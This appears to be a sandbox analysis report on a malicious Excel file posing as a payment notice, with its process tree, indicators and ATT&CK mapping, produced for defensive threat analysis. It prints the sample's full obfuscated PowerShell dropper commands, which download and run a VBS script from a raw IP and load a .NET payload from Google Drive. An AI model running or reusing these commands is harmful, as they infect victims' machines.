057dee21a70fecbb36618b33c27ad7c059c4ab99e0937e01fe398fb30af5bd98

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
06-11-2024 07:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Aviso de pago.xls
Size

645KB
MD5

edc3869ba8b78118979f05fbe9098b83
SHA1

3129170a970c1ba4fe05b5bbe4b88a1b5da03db8
SHA256

057dee21a70fecbb36618b33c27ad7c059c4ab99e0937e01fe398fb30af5bd98
SHA512

9e3e435617361fc438daf3700580f702df6f38f43a2ec1105bacc23e722235168f4eca62c44850c3fc732ebc64d98e5ed932d0c8827e5c700854b868ebfeb652
SSDEEP

12288:ubWNHd0zBcp2b6eTPOYlgSFG7nRzBMLu2ogAEWalBdU:6sdDMmeT2Y5WQocWi

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 7 IoCs

flow	pid	Process
10	2680	mshta.exe
11	2680	mshta.exe
13	1096	pOwERShelL.eXE
15	1316	WScript.exe
16	1316	WScript.exe
18	2072	powershell.exe
20	2072	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2072	powershell.exe
2384	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1096	pOwERShelL.eXE
2588	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	drive.google.com
18	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	pOwERShelL.eXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOwERShelL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1504	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1096	pOwERShelL.eXE
2588	powershell.exe
1096	pOwERShelL.eXE
1096	pOwERShelL.eXE
2384	powershell.exe
2072	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1096	pOwERShelL.eXE
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	2072	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1504	EXCEL.EXE
1504	EXCEL.EXE
1504	EXCEL.EXE
1504	EXCEL.EXE
1504	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2680 wrote to memory of 1096	2680	mshta.exe	32
PID 2680 wrote to memory of 1096	2680	mshta.exe	32
PID 2680 wrote to memory of 1096	2680	mshta.exe	32
PID 2680 wrote to memory of 1096	2680	mshta.exe	32
PID 1096 wrote to memory of 2588	1096	pOwERShelL.eXE	34
PID 1096 wrote to memory of 2588	1096	pOwERShelL.eXE	34
PID 1096 wrote to memory of 2588	1096	pOwERShelL.eXE	34
PID 1096 wrote to memory of 2588	1096	pOwERShelL.eXE	34
PID 1096 wrote to memory of 1484	1096	pOwERShelL.eXE	35
PID 1096 wrote to memory of 1484	1096	pOwERShelL.eXE	35
PID 1096 wrote to memory of 1484	1096	pOwERShelL.eXE	35
PID 1096 wrote to memory of 1484	1096	pOwERShelL.eXE	35
PID 1484 wrote to memory of 2484	1484	csc.exe	36
PID 1484 wrote to memory of 2484	1484	csc.exe	36
PID 1484 wrote to memory of 2484	1484	csc.exe	36
PID 1484 wrote to memory of 2484	1484	csc.exe	36
PID 1096 wrote to memory of 1316	1096	pOwERShelL.eXE	37
PID 1096 wrote to memory of 1316	1096	pOwERShelL.eXE	37
PID 1096 wrote to memory of 1316	1096	pOwERShelL.eXE	37
PID 1096 wrote to memory of 1316	1096	pOwERShelL.eXE	37
PID 1316 wrote to memory of 2384	1316	WScript.exe	38
PID 1316 wrote to memory of 2384	1316	WScript.exe	38
PID 1316 wrote to memory of 2384	1316	WScript.exe	38
PID 1316 wrote to memory of 2384	1316	WScript.exe	38
PID 2384 wrote to memory of 2072	2384	powershell.exe	40
PID 2384 wrote to memory of 2072	2384	powershell.exe	40
PID 2384 wrote to memory of 2072	2384	powershell.exe	40
PID 2384 wrote to memory of 2072	2384	powershell.exe	40

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Aviso de pago.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1504

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2680
- C:\Windows\SysWOW64\wINDoWSpoWersheLl\v1.0\pOwERShelL.eXE
  "C:\Windows\SYsTEm32\wINDoWSpoWersheLl\v1.0\pOwERShelL.eXE" "pOWeRShelL -eX bYpASS -nop -W 1 -C DEvICeCreDeNtiAldEPloYmENT.eXE ; iex($(iEx('[sYSteM.tExt.EncodInG]'+[ChaR]0X3a+[cHAR]58+'Utf8.gEtStRing([SYstEM.cONVErT]'+[ChAr]58+[char]58+'FROMBAse64strIng('+[CHAr]34+'JDJhZE8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVSRGVmSU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFBUWGpSLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdmT2ZrZkhqak9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlIZWR4UkpjeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0QpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJwRHRacHNWY3hsIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzTk5RICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQyYWRPOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vODcuMTIwLjExMy4yMTcvY29tZWhvbWVjb25zdHJhaW50cy52YnMiLCIkZW52OkFQUERBVEFcY29tZWhvbWVjb25zdHJhaW50cy52YnMiLDAsMCk7c3RhUnQtU2xlZVAoMyk7U1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGNvbWVob21lY29uc3RyYWludHMudmJzIg=='+[CHaR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASS -nop -W 1 -C DEvICeCreDeNtiAldEPloYmENT.eXE
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2588
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\675i58e8.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1484
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1814.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1813.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2484
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\comehomeconstraints.vbs"
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1316
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCc3NmdpbWFnZVVybCA9IEpreWh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MVV5SCcrJ3F3cm5YQ2xLQicrJ0ozajYzTGwxdCcrJzJTdFZnR3hiU3QwIEpreTs3NmcnKyd3ZWJDbGllbnQgPSBOZXctT2InKydqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50Ozc2Z2ltYWdlQnl0ZXMgPSA3Nmd3ZWJDbGllbnQuRG93bmxvYScrJ2REYXRhKDc2Z2ltYWdlVXJsKTs3NmdpbWFnZVQnKydleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg3NmdpbWFnZUJ5dGVzKTs3NmdzdGFydEZsYWcgPSBKa3k8PEJBU0U2NF9TVEFSVD4+Smt5Ozc2Z2VuZEZsYWcgPSBKa3k8PEJBU0U2NF9FTkQ+PkpreTs3NmdzdGFydEluZGV4ID0gNzYnKydnaW1hZ2VUZXh0LkluZGV4T2YoNzZnc3RhcnRGbGFnKTs3NmdlbicrJ2RJbmRleCA9IDc2Z2ltYWdlVGV4dC5JbmRleE9mKDc2JysnZ2VuZEZsYWcpOzc2Z3N0YXJ0SW5kZXggLWdlIDAgLWFuZCA3NmdlbmRJbmRleCAtZ3QgNzZnc3RhcnRJbmRleDs3NmdzdGFydEluZGV4ICs9IDc2Z3N0YXJ0RmxhZy5MZW5ndGgnKyc7NzZnYmFzZTY0TGVuZ3RoID0gNzZnZW5kSW5kZXggLSA3NmdzdGFydEknKyduZGV4Ozc2Z2Jhc2U2NENvbW1hbmQgPSA3NmdpbWFnZVRleHQuU3Vic3RyaW5nKDc2Z3N0YXJ0SW5kZXgsIDc2Z2Jhc2U2NExlbmd0aCk7JysnNzZnYmFzZTY0UmV2ZXInKydzZWQgPSAtam9pbiAoNzZnYmFzZTY0Q29tbWEnKyduZC5Ub0NoYXJBcnJheSgpIGpubyBGb3JFYWNoLU9iamVjdCB7IDc2Z18gfSlbLTEuLicrJy0oNzZnYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTs3Nmdjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDc2Z2Jhc2U2NFJldmVyc2VkKTs3Nmdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoNzZnY29tbWFuZEJ5dGVzKTs3NicrJ2d2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKEpreVZBSUpreSk7NzZndmFpTWV0aG9kLkludicrJ29rZSg3NmdudWxsLCBAKEpreXR4dC5zc3Nzc3NhY2lyZW1BLzcxMi4zMTEuMDIxLjc4Ly86cHR0aEpreSwgSmt5ZGVzYXRpdmEnKydkb0preSwgSmt5ZGVzYXRpdmFkb0preSwgSmt5ZGVzYXRpdmFkb0preScrJywgSmt5TVNCdWlsZEpreSwgSmt5JysnZGUnKydzYXRpdmFkb0preSwgSmt5ZGVzYXRpdmFkb0preSxKa3lkZXNhdGl2YWRvSmt5LEpreScrJ2Rlc2EnKyd0aXZhZG8nKydKa3ksSmt5ZGVzYXRpdmFkb0preSxKa3lkZXNhdGl2YWRvSmt5LEpreWRlc2F0aXZhZG9Ka3ksSmt5MUpreSxKa3lkZXNhdGl2YWRvSmt5KSk7JykuckVQTGFDZSgoW0NIYXJdNTUrW0NIYXJdNTQrW0NIYXJdMTAzKSwnJCcpLnJFUExhQ2UoKFtDSGFyXTEwNitbQ0hhcl0xMTArW0NIYXJdMTExKSwnfCcpLnJFUExhQ2UoJ0preScsW1N0ckluR11bQ0hhcl0zOSkgfCYoICRFbnY6Y09tc3BlQ1s0LDI2LDI1XS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2384
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('76gimageUrl = Jkyhttps://drive.google.com/uc?export=download&id=1UyH'+'qwrnXClKB'+'J3j63Ll1t'+'2StVgGxbSt0 Jky;76g'+'webClient = New-Ob'+'ject System.Net.WebClient;76gimageBytes = 76gwebClient.Downloa'+'dData(76gimageUrl);76gimageT'+'ext = [System.Text.Encoding]::UTF8.GetString(76gimageBytes);76gstartFlag = Jky<<BASE64_START>>Jky;76gendFlag = Jky<<BASE64_END>>Jky;76gstartIndex = 76'+'gimageText.IndexOf(76gstartFlag);76gen'+'dIndex = 76gimageText.IndexOf(76'+'gendFlag);76gstartIndex -ge 0 -and 76gendIndex -gt 76gstartIndex;76gstartIndex += 76gstartFlag.Length'+';76gbase64Length = 76gendIndex - 76gstartI'+'ndex;76gbase64Command = 76gimageText.Substring(76gstartIndex, 76gbase64Length);'+'76gbase64Rever'+'sed = -join (76gbase64Comma'+'nd.ToCharArray() jno ForEach-Object { 76g_ })[-1..'+'-(76gbase64Command.Length)];76gcommandBytes = [System.Convert]::FromBase64String(76gbase64Reversed);76gloadedAssembly = [System.Reflection.Assembly]::Load(76gcommandBytes);76'+'gvaiMethod = [dnlib.IO.Home].GetMethod(JkyVAIJky);76gvaiMethod.Inv'+'oke(76gnull, @(Jkytxt.ssssssaciremA/712.311.021.78//:ptthJky, Jkydesativa'+'doJky, JkydesativadoJky, JkydesativadoJky'+', JkyMSBuildJky, Jky'+'de'+'sativadoJky, JkydesativadoJky,JkydesativadoJky,Jky'+'desa'+'tivado'+'Jky,JkydesativadoJky,JkydesativadoJky,JkydesativadoJky,Jky1Jky,JkydesativadoJky));').rEPLaCe(([CHar]55+[CHar]54+[CHar]103),'$').rEPLaCe(([CHar]106+[CHar]110+[CHar]111),'|').rEPLaCe('Jky',[StrInG][CHar]39) |&( $Env:cOmspeC[4,26,25]-jOIN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2072

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
23a75b1da103535481b08b089328e160

SHA1
441daf0632e22019e4573d1a3226aac043e98cf2

SHA256
d4d4ee57cd4e10cd15d0c442b18ea242009af5a2f90fe782e7c9371ce4742039

SHA512
259462b451836cc8340857e124af192be055110ac085f9d2c6d22e9fc9f8e5a251af71a3c2b7706265fb6c8ea428ad1793be8cb3d4520cc1b3ba6e44853210cf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c011a170a9ac9e6f61a8259b0ef709b5

SHA1
b32039626cb4f28d6e806ec4aae9ac402f830f21

SHA256
8d7a6844a4428fc9a769fc04ef14cf2284b25534ae0fd86a8a663bad97c3e90b

SHA512
f57088e9168f308d64242533a82612fbd519d97f5ebcd66c7423e5173a361966c26a100674fdd887759ca371e08e4fac3d619ed15a7fa48ba094e03fa1d74f1e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
970e85d21a0ec836849fcdbec47a71cf

SHA1
8cc7312ab9f853a34365d9dbe13caa9a986d1fdf

SHA256
3b70ee8bd80ac9789c6c2d7a09fe99c6aff72f2507c2740a38b00c353874d2f5

SHA512
94e83e3619977b9ff05b0ad363161475182f3c769308853544f681480f0492254f3924f7554db867df4dfd634b62ec5ae6f5c9fe7af22aae580ae4289f9ef7ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\createdbestthingswithgoodnewswithgreatfriendship[1].hta

Filesize
8KB

MD5
438ffa8da8951d921d02dcb0f5687202

SHA1
ef7fae684fa24f547cabdce82bafde1f0713139e

SHA256
62d8c5f5087b294ea9377c1ff6770bb0d0e60e5ff4c9954007297ba15e988b63

SHA512
1041f0dcea336eb2209f39a73491c1b37735ac0713010cf1525e8f6dd1a2a0190ecd3be974c4666811b1689992e2d81718a54356b3e9942755c01d6fde953b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\675i58e8.dll

Filesize
3KB

MD5
6c79ebde4dcc29bb9b1ca37683cbb7a0

SHA1
9078dc880742df1d0010a7e97f2182937fd2d04a

SHA256
a8be4d8b604cee2a5c53afef4e6f1f5cdf5a4e3eb063883b49856c4a27022388

SHA512
2ea9de98f8ab133dfebb800aca06a9839013e95723bd57d403bf026aa7eecc76882aa680fccfe9ca26d111f4ab463bf20e03ece1d86c7450746ae6aec944f469

Download Submit
C:\Users\Admin\AppData\Local\Temp\675i58e8.pdb

Filesize
7KB

MD5
2648bf407fccbc05a8124d1d2ace6da8

SHA1
b9c107382c30c44a65f1ee7c0254b9f9e482090d

SHA256
06bf9cb34807e00235c088efbbe0d13c3b14ccfd791ccf0a36dc7c53db4cefd0

SHA512
9893528eda0327c4e53e7e64581001f02aeac154d75658f730d8e17a3003dde9fca10eea6e89c9f59b6299bef161107d6c78c94a52d4b2b384d2fa7b9f171936

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF1E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1814.tmp

Filesize
1KB

MD5
94a60877be9cb5c1649a97d1f38e7bb0

SHA1
6fbe87b8db0943100cdcc61901ca67c15e171e9f

SHA256
40f5d9f85915c9986dcf756ac10265f343e00ca7c82227b9a85b82ba389b2bf2

SHA512
2e0bc32fe211074d4e9d3781182d22cbc3ca7589c213d62f8d419df77aadba9c73e8c8391cf15f325e55317e5cb6e28ba3b6e4924372a9ac8bb09a96900d4e2c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8683b810246a08725f4a05959882a4f2

SHA1
feb17a70a66eb63b7d338fe4e0a769826c2bcb71

SHA256
f34614349317becd6b525c71747a1aab31583f9f51eb731d67fcb4e5684842a0

SHA512
22abc4174424c69f6b94bf883be079cd98569f4d2c432bd2e6ed12abeff577381f1320ff61ab25eb45ca63389aeb95672d4f78fd71c8b08a35f5fa972206f55f

Download Submit
C:\Users\Admin\AppData\Roaming\comehomeconstraints.vbs

Filesize
68KB

MD5
83f0ff3bb1895359398311cc564f6f51

SHA1
9630ec8b82422a5f0651cb053a56c58f18a48d8b

SHA256
1773b2beda8270d2c3302eccf68060e3b240f706b80a9976bf98140510d411f5

SHA512
a1c7a08d5738e0a0feb3bb652fe81ab9dbab6643d090b1612044a923fd0b324980fb4a5200efde6eb4834cd11f166fc0d1c5ce588773d3fce418ef0c0280cec8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\675i58e8.0.cs

Filesize
481B

MD5
384b3d0cb35d87100c908a9e508a10fb

SHA1
df2f40522a8aeef08b9c3da07e2fdf2811a6bac2

SHA256
beff9701abc7a44face884a0a0f1d5386e9428974334532180f0238d3d092b25

SHA512
a3bfdada9fec6ea3fbeccc73bc5ae4935bba64cecc520a4387af40bd61878e06519046382b907cae307db9d975c8f681e34bb40d4f2b309dbdf1d9824e871a08

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\675i58e8.cmdline

Filesize
309B

MD5
57debbe64922c0b4e88d35ff48fdec7f

SHA1
7d775108b5c098a131c77dbda67c80d3d7db8667

SHA256
97986403739c82fbf1fdbff1f07de098d7783996d799f1c1c7c60f5fb4813c94

SHA512
3823e69c07b09f3fff296c8d1fdc77eff7c07dd140fce136f72e5f1519988555bb5d5c8edb23bb0df1011258c0349fceb2b8f8ebeb9a1f06f88a2dae70426708

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1813.tmp

Filesize
652B

MD5
cf004290ab29e01961f8b6be52eac7ca

SHA1
783910726b8806c9a7f647528f31293f903eb6e9

SHA256
9ad58b5618ef066368bfe622e2a8db27c5f760c69ffc6b8146b91c71055e47e2

SHA512
07c4e02370c5d537511ab768c582db923f8ad743ff4e05aa6147324bccdb1ac013f26164ca02d357c742276b9854736d09c9b97fc8f41ac1b911390ddfadffa7

Download Submit
memory/1504-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1504-19-0x00000000024B0000-0x00000000024B2000-memory.dmp

Filesize
8KB

Download
memory/1504-1-0x0000000072A5D000-0x0000000072A68000-memory.dmp

Filesize
44KB

Download
memory/1504-77-0x0000000072A5D000-0x0000000072A68000-memory.dmp

Filesize
44KB

Download
memory/2680-18-0x0000000001C80000-0x0000000001C82000-memory.dmp

Filesize
8KB

Download